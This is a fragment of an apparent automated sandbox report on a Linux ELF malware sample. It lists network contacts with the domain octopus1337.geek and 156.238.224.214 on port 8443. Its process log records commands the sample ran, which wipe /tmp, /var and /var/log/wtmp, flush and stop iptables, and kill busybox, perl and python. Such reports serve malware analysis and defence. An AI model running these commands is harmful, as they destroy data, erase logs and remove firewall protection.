                                                                  Oct 7, 2024 01:17:05.279907942 CEST529088443192.168.2.15156.238.224.214
                                                                  Oct 7, 2024 01:17:05.279948950 CEST529088443192.168.2.15156.238.224.214
                                                                  Oct 7, 2024 01:17:05.284668922 CEST844352908156.238.224.214192.168.2.15
                                                                  Oct 7, 2024 01:17:05.284727097 CEST529088443192.168.2.15156.238.224.214
                                                                  Oct 7, 2024 01:17:05.289589882 CEST844352908156.238.224.214192.168.2.15
                                                                  Oct 7, 2024 01:17:05.845848083 CEST844352908156.238.224.214192.168.2.15
                                                                  Oct 7, 2024 01:17:05.845958948 CEST529088443192.168.2.15156.238.224.214
                                                                  Oct 7, 2024 01:17:05.851187944 CEST844352908156.238.224.214192.168.2.15
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 7, 2024 01:15:28.214932919 CEST3824553192.168.2.15195.10.195.195
                                                                  Oct 7, 2024 01:15:28.222261906 CEST5338245195.10.195.195192.168.2.15
                                                                  Oct 7, 2024 01:15:29.424154043 CEST4737353192.168.2.15195.10.195.195
                                                                  Oct 7, 2024 01:15:29.435098886 CEST5347373195.10.195.195192.168.2.15
                                                                  Oct 7, 2024 01:15:29.829056978 CEST3569053192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:15:31.016869068 CEST6071553192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:15:34.835251093 CEST4364153192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:15:36.023714066 CEST4354453192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:15:39.839013100 CEST5916653192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:15:41.026139975 CEST4647053192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:15:44.842458010 CEST5665853192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:15:46.034908056 CEST5360853192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:15:49.845782995 CEST3454453192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:15:51.037736893 CEST3628853192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:15:58.034281015 CEST4604253192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:15:59.200669050 CEST5110653192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:03.037091017 CEST3643153192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:04.206387043 CEST3325753192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:08.040999889 CEST4472453192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:09.209219933 CEST6068553192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:13.045886993 CEST3723953192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:14.213103056 CEST4869353192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:18.048896074 CEST5776553192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:19.218169928 CEST3486153192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:24.660052061 CEST5850253192.168.2.15134.195.4.2
                                                                  Oct 7, 2024 01:16:24.674412966 CEST5358502134.195.4.2192.168.2.15
                                                                  Oct 7, 2024 01:16:25.801098108 CEST5153053192.168.2.15134.195.4.2
                                                                  Oct 7, 2024 01:16:25.815352917 CEST5351530134.195.4.2192.168.2.15
                                                                  Oct 7, 2024 01:16:26.291943073 CEST3615953192.168.2.1551.158.108.203
                                                                  Oct 7, 2024 01:16:26.307493925 CEST533615951.158.108.203192.168.2.15
                                                                  Oct 7, 2024 01:16:27.410502911 CEST5653153192.168.2.1551.158.108.203
                                                                  Oct 7, 2024 01:16:27.426582098 CEST535653151.158.108.203192.168.2.15
                                                                  Oct 7, 2024 01:16:31.254523993 CEST4747353192.168.2.1551.77.149.139
                                                                  Oct 7, 2024 01:16:31.264552116 CEST534747351.77.149.139192.168.2.15
                                                                  Oct 7, 2024 01:16:32.224795103 CEST5231253192.168.2.1551.77.149.139
                                                                  Oct 7, 2024 01:16:32.238332033 CEST535231251.77.149.139192.168.2.15
                                                                  Oct 7, 2024 01:16:36.062696934 CEST5414453192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:36.976052046 CEST5299153192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:41.066189051 CEST4621053192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:41.980146885 CEST6009153192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:46.071744919 CEST4891753192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:46.984086990 CEST3723753192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:51.078274965 CEST5039753192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:51.988020897 CEST5512053192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:56.083837032 CEST4926553192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:16:56.991539955 CEST3970653192.168.2.15178.254.22.166
                                                                  Oct 7, 2024 01:17:02.680279970 CEST4014153192.168.2.1551.158.108.203
                                                                  Oct 7, 2024 01:17:02.695823908 CEST534014151.158.108.203192.168.2.15
                                                                  Oct 7, 2024 01:17:03.604142904 CEST4160653192.168.2.1551.158.108.203
                                                                  Oct 7, 2024 01:17:03.619986057 CEST534160651.158.108.203192.168.2.15
                                                                  Oct 7, 2024 01:17:04.285965919 CEST3368253192.168.2.15185.181.61.24
                                                                  Oct 7, 2024 01:17:04.319181919 CEST5333682185.181.61.24192.168.2.15
                                                                  Oct 7, 2024 01:17:05.241638899 CEST3459753192.168.2.15185.181.61.24
                                                                  Oct 7, 2024 01:17:05.274564028 CEST5334597185.181.61.24192.168.2.15
                                                                  Oct 7, 2024 01:17:05.939747095 CEST3443153192.168.2.1591.217.137.37
                                                                  Oct 7, 2024 01:17:06.848480940 CEST5362053192.168.2.1591.217.137.37
                                                                  Oct 7, 2024 01:17:10.943181992 CEST6059353192.168.2.1591.217.137.37
                                                                  Oct 7, 2024 01:17:11.851685047 CEST4086653192.168.2.1591.217.137.37
                                                                  Oct 7, 2024 01:17:15.947263956 CEST5770453192.168.2.1591.217.137.37
                                                                  Oct 7, 2024 01:17:16.857193947 CEST4559053192.168.2.1591.217.137.37
                                                                  Oct 7, 2024 01:17:20.951292038 CEST4252453192.168.2.1591.217.137.37
                                                                  Oct 7, 2024 01:17:21.866552114 CEST4415153192.168.2.1591.217.137.37
                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                  Oct 7, 2024 01:17:05.992736101 CEST77.87.200.186192.168.2.156f20(Host unreachable)Destination Unreachable
                                                                  Oct 7, 2024 01:17:06.900418043 CEST77.87.200.186192.168.2.156f20(Host unreachable)Destination Unreachable
                                                                  Oct 7, 2024 01:17:10.996049881 CEST77.87.200.186192.168.2.156f20(Host unreachable)Destination Unreachable
                                                                  Oct 7, 2024 01:17:11.903479099 CEST77.87.200.186192.168.2.156f20(Host unreachable)Destination Unreachable
                                                                  Oct 7, 2024 01:17:15.998965979 CEST77.87.200.186192.168.2.156f20(Host unreachable)Destination Unreachable
                                                                  Oct 7, 2024 01:17:16.910239935 CEST77.87.200.186192.168.2.156f20(Host unreachable)Destination Unreachable
                                                                  Oct 7, 2024 01:17:21.004260063 CEST77.87.200.186192.168.2.156f20(Host unreachable)Destination Unreachable
                                                                  Oct 7, 2024 01:17:21.919713020 CEST77.87.200.186192.168.2.156f20(Host unreachable)Destination Unreachable
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Oct 7, 2024 01:15:28.214932919 CEST192.168.2.15195.10.195.1950x7544Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:15:29.424154043 CEST192.168.2.15195.10.195.1950x7544Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:15:29.829056978 CEST192.168.2.15178.254.22.1660xb995Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:15:31.016869068 CEST192.168.2.15178.254.22.1660xb995Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:15:34.835251093 CEST192.168.2.15178.254.22.1660xb995Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:15:36.023714066 CEST192.168.2.15178.254.22.1660xb995Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:15:39.839013100 CEST192.168.2.15178.254.22.1660xb995Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:15:41.026139975 CEST192.168.2.15178.254.22.1660xb995Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:15:44.842458010 CEST192.168.2.15178.254.22.1660xb995Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:15:46.034908056 CEST192.168.2.15178.254.22.1660xb995Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:15:49.845782995 CEST192.168.2.15178.254.22.1660xb995Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:15:51.037736893 CEST192.168.2.15178.254.22.1660xb995Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:15:58.034281015 CEST192.168.2.15178.254.22.1660x6d6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:15:59.200669050 CEST192.168.2.15178.254.22.1660x6d6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:03.037091017 CEST192.168.2.15178.254.22.1660x6d6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:04.206387043 CEST192.168.2.15178.254.22.1660x6d6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:08.040999889 CEST192.168.2.15178.254.22.1660x6d6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:09.209219933 CEST192.168.2.15178.254.22.1660x6d6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:13.045886993 CEST192.168.2.15178.254.22.1660x6d6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:14.213103056 CEST192.168.2.15178.254.22.1660x6d6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:18.048896074 CEST192.168.2.15178.254.22.1660x6d6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:19.218169928 CEST192.168.2.15178.254.22.1660x6d6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:24.660052061 CEST192.168.2.15134.195.4.20x291dStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:25.801098108 CEST192.168.2.15134.195.4.20x291dStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:26.291943073 CEST192.168.2.1551.158.108.2030x3130Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:27.410502911 CEST192.168.2.1551.158.108.2030x3130Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:31.254523993 CEST192.168.2.1551.77.149.1390x3eb8Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:32.224795103 CEST192.168.2.1551.77.149.1390x3eb8Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:36.062696934 CEST192.168.2.15178.254.22.1660xaadeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:36.976052046 CEST192.168.2.15178.254.22.1660xaadeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:41.066189051 CEST192.168.2.15178.254.22.1660xaadeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:41.980146885 CEST192.168.2.15178.254.22.1660xaadeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:46.071744919 CEST192.168.2.15178.254.22.1660xaadeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:46.984086990 CEST192.168.2.15178.254.22.1660xaadeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:51.078274965 CEST192.168.2.15178.254.22.1660xaadeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:51.988020897 CEST192.168.2.15178.254.22.1660xaadeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:56.083837032 CEST192.168.2.15178.254.22.1660xaadeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:56.991539955 CEST192.168.2.15178.254.22.1660xaadeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:02.680279970 CEST192.168.2.1551.158.108.2030x8b5eStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:03.604142904 CEST192.168.2.1551.158.108.2030x8b5eStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:04.285965919 CEST192.168.2.15185.181.61.240x988dStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:05.241638899 CEST192.168.2.15185.181.61.240x988dStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:05.939747095 CEST192.168.2.1591.217.137.370x3c2eStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:06.848480940 CEST192.168.2.1591.217.137.370x3c2eStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:10.943181992 CEST192.168.2.1591.217.137.370x3c2eStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:11.851685047 CEST192.168.2.1591.217.137.370x3c2eStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:15.947263956 CEST192.168.2.1591.217.137.370x3c2eStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:16.857193947 CEST192.168.2.1591.217.137.370x3c2eStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:20.951292038 CEST192.168.2.1591.217.137.370x3c2eStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:21.866552114 CEST192.168.2.1591.217.137.370x3c2eStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Oct 7, 2024 01:15:28.222261906 CEST195.10.195.195192.168.2.150x7544No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:15:29.435098886 CEST195.10.195.195192.168.2.150x7544No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:24.674412966 CEST134.195.4.2192.168.2.150x291dNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:25.815352917 CEST134.195.4.2192.168.2.150x291dNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:26.307493925 CEST51.158.108.203192.168.2.150x3130No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:27.426582098 CEST51.158.108.203192.168.2.150x3130No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:31.264552116 CEST51.77.149.139192.168.2.150x3eb8No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:16:32.238332033 CEST51.77.149.139192.168.2.150x3eb8No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:02.695823908 CEST51.158.108.203192.168.2.150x8b5eNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:03.619986057 CEST51.158.108.203192.168.2.150x8b5eNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:04.319181919 CEST185.181.61.24192.168.2.150x988dNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 01:17:05.274564028 CEST185.181.61.24192.168.2.150x988dNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false

                                                                  System Behavior

                                                                  Start time (UTC):23:14:49
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:14:49
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/rm
                                                                  Arguments:rm -f /tmp/tmp.fI4m1NBVX4 /tmp/tmp.0aDbaPXlHh /tmp/tmp.j6TAhrR2Ij
                                                                  File size:72056 bytes
                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                  Start time (UTC):23:14:49
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:14:49
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/rm
                                                                  Arguments:rm -f /tmp/tmp.fI4m1NBVX4 /tmp/tmp.0aDbaPXlHh /tmp/tmp.j6TAhrR2Ij
                                                                  File size:72056 bytes
                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                  Start time (UTC):23:14:58
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:/tmp/OocBsRyXoT.elf
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:14:58
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:14:58
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:14:58
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:14:58
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/rm
                                                                  Arguments:rm -rf /tmp/OocBsRyXoT.elf /tmp/config-err-8GMGF7 /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-oCVxfzsbTQaT /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-ModemManager.service-gKnN3f /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-colord.service-ttuwai /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-fwupd.service-RBxnUi /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-switcheroo-control.service-2Gilej /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-logind.service-Nw8Bch /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-resolved.service-b6o3kh /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-timedated.service-57YtQh /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-upower.service-70vK5e /tmp/vmware-root_724-2965906890 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-ModemManager.service-8RZKbg /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-colord.service-i36c6f /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-fwupd.service-ScOpqh /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-switcheroo-control.service-HC2Noh /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-logind.service-IgPdPh /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-resolved.service-VqRX8h /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-timedated.service-JxTQHi /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-upower.service-aLITRg /var/log/wtmp
                                                                  File size:72056 bytes
                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                  Start time (UTC):23:15:04
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:04
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "rm -rf /tmp/*"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:04
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:04
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/rm
                                                                  Arguments:rm -rf /tmp/*
                                                                  File size:72056 bytes
                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                  Start time (UTC):23:15:04
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:04
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "iptables -F"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:04
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:04
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/iptables
                                                                  Arguments:iptables -F
                                                                  File size:99296 bytes
                                                                  MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                  Start time (UTC):23:15:04
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:04
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "pkill -9 busybox"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:04
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:04
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/pkill
                                                                  Arguments:pkill -9 busybox
                                                                  File size:30968 bytes
                                                                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                  Start time (UTC):23:15:07
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:07
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "pkill -9 perl"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:07
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:07
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/pkill
                                                                  Arguments:pkill -9 perl
                                                                  File size:30968 bytes
                                                                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                  Start time (UTC):23:15:09
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:09
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "pkill -9 python"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:09
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:09
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/pkill
                                                                  Arguments:pkill -9 python
                                                                  File size:30968 bytes
                                                                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "service iptables stop"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/service
                                                                  Arguments:service iptables stop
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/service
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/basename
                                                                  Arguments:basename /usr/sbin/service
                                                                  File size:39256 bytes
                                                                  MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/service
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/basename
                                                                  Arguments:basename /usr/sbin/service
                                                                  File size:39256 bytes
                                                                  MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/service
                                                                  Arguments:-
                                                                  File size:129816 bytes
